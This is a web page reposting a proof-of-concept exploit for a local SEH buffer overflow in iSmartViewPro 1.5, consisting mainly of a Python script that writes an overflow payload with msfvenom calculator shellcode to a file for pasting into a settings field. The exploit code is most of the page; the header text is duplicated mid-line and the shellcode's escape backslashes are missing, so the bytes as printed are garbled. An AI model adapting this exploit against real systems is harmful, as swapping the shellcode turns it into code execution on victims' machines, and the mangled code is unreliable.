iSmartViewPro 1.5 Local Buffer Overflow

Details
Category: Vulnerabilities
Hits: 338
# Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-07
# Software Link: htt # Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow (SEH)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-07
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
# Tested Version: 1.5
# Tested on OS: Windows 7 32bit
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name
# "exploit.txt" just copy the text inside "exploit.txt" and start the
# iSmartViewPro 1.5 program and click on "System Setup" in the
# "Save Path for Snapshot and Record file" field. Paste the content of
# "exploit.txt" and click on Save. You will see a calculator poped up.

#!/usr/bin/python

buffer = "A" * 260

NSEH = "xebx06x90x90"

SEH = "xdfx16x01x10"
nops = "x90" * 4000
#badchar x00x0ax0dx2f
#msfvenom calculator
buf = ""
buf += "xbax9ax98xafx7exddxc2xd9x74x24xf4x5fx29"
buf += "xc9xb1x31x83xc7x04x31x57x0fx03x57x95x7a"
buf += "x5ax82x41xf8xa5x7bx91x9dx2cx9exa0x9dx4b"
buf += "xeax92x2dx1fxbex1exc5x4dx2bx95xabx59x5c"
buf += "x1ex01xbcx53x9fx3axfcxf2x23x41xd1xd4x1a"
buf += "x8ax24x14x5bxf7xc5x44x34x73x7bx79x31xc9"
buf += "x40xf2x09xdfxc0xe7xd9xdexe1xb9x52xb9x21"
buf += "x3bxb7xb1x6bx23xd4xfcx22xd8x2ex8axb4x08"
buf += "x7fx73x1ax75xb0x86x62xb1x76x79x11xcbx85"
buf += "x04x22x08xf4xd2xa7x8bx5ex90x10x70x5fx75"
buf += "xc6xf3x53x32x8cx5cx77xc5x41xd7x83x4ex64"
buf += "x38x02x14x43x9cx4fxcexeax85x35xa1x13xd5"
buf += "x96x1exb6x9dx3ax4axcbxffx50x8dx59x7ax16"
buf += "x8dx61x85x06xe6x50x0exc9x71x6dxc5xaex8e"
buf += "x27x44x86x06xeex1cx9bx4ax11xcbxdfx72x92"
buf += "xfex9fx80x8ax8ax9axcdx0cx66xd6x5exf9x88"
buf += "x45x5ex28xebx08xccxb0xc2xafx74x52x1b"
pad = "B" * (6384 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )

payload = buffer + NSEH + SEH + nops + buf + pad
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"